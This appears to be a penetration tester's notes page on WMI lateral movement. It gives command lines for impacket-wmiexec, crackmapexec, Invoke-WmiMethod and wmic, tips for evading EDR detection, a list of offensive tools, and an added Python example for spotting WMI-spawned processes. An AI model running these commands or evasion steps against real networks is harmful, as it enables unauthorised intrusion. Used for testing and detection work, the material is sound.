WMI Lateral Movement

05.06.2024 · dadevel

Lateral Movement over WMI.

The classic method uses the Win32_Process class to execute a command that writes its output to a file, then downloads that file via SMB.

impacket-wmiexec -shell-type powershell -k -no-pass srv01.corp.local
impacket-wmiexec -shell-type powershell -silentcommand -nooutput -k -no-pass srv01.corp.local "$(< ./shell.ps1)"

OpSec: When -silentcommand is specified the command is not executed via cmd.exe. When -nooutput is specified the output is not written to a file and no SMB connection is made.
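From the defender's side, the two OpSec switches above change what process telemetry records: the classic path leaves a cmd.exe child of WmiPrvSE.exe with stdout redirected to a file (followed by an SMB read of that file), while the silent variants only leave the payload process itself under WmiPrvSE.exe. The following is an added triage example, not code from the original post; the Sysmon-style records and the vendor path are constructed.

```python
import re
from typing import Optional

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    # classic wmiexec: cmd.exe under WmiPrvSE.exe, output redirected to a file that is later fetched over SMB
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami /all 1> C:\Windows\Temp\out.txt 2>&1"},
    # -silentcommand -nooutput style: payload launched without cmd.exe and without an output file
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-Process"},
    # same redirect pattern, but from an interactive shell: not WMI-initiated
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami /all 1> C:\Windows\Temp\out.txt 2>&1"},
    # constructed management-agent noise under WmiPrvSE.exe (hypothetical vendor path)
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Program Files\ExampleVendor\inventory.exe",
     "CommandLine": r'"C:\Program Files\ExampleVendor\inventory.exe" /scan'},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# stdout/stderr redirected to a path, e.g. "1> C:\...\out.txt 2>&1"
REDIRECT = re.compile(r"(?:^|\s)[12]?>{1,2}\s*\S|2>&1")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Label one process-creation event; None means the process was not spawned by WMI."""
    if basename(event["ParentImage"]) != "wmiprvse.exe":
        return None
    child = basename(event["Image"])
    if child in SHELLS and REDIRECT.search(event["CommandLine"]):
        # classic pattern: correlate with a following SMB read of that file from the same source host
        return "wmi-shell-output-to-file"
    if child in SHELLS:
        return "wmi-shell-no-output-file"
    return "wmi-child-review"


def triage(events: list) -> list:
    """Return (label, command line) pairs for every WMI-spawned process in the input."""
    hits = []
    for event in events:
        label = classify(event)
        if label is not None:
            hits.append((label, event["CommandLine"]))
    return hits
```

Keying on the WmiPrvSE.exe parent rather than on cmd.exe means the silent variants are still surfaced; the output-file label is what tells you to look for the matching SMB file read.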

crackmapexec smb srv01.corp.local -u jdoe -p 'passw0rd' --exec-method wmiexec -x 'whoami /all'

OpSec: Many EDRs detect the use of -X.

$c = New-Object System.Management.Automation.PSCredential -ArgumentList ('jdoe', (ConvertTo-SecureString 'passw0rd' -AsPlainText -Force))
Invoke-WmiMethod -Credential $c -Class Win32_Process -Name Create -ArgumentList 'whoami /all' -ComputerName srv01.corp.local
wmic.exe /node:srv01.corp.local /user:"corp\jdoe" /password:"passw0rd" process call create "whoami /all 1> C:\Windows\Temp\out.txt 2>&1"

Note: If moving laterally over WMI while impersonating a token fails with error 5, you have probably run into The Curious Case of CoInitializeSecurity. Try again from a different process.

Untested tools:

  • PerfExec, DLL execution through Performance Monitor, see Performance, Diagnostics, and WMI
  • wmiexec, command execution by creating scheduled task over WMI, no SMB interaction
  • wmiexec-pro, command execution with output retrieval and file upload/download, no SMB interaction
  • LiquidSnake, creates a WMI event filter that executes VBScript that loads a .NET assembly that executes your shellcode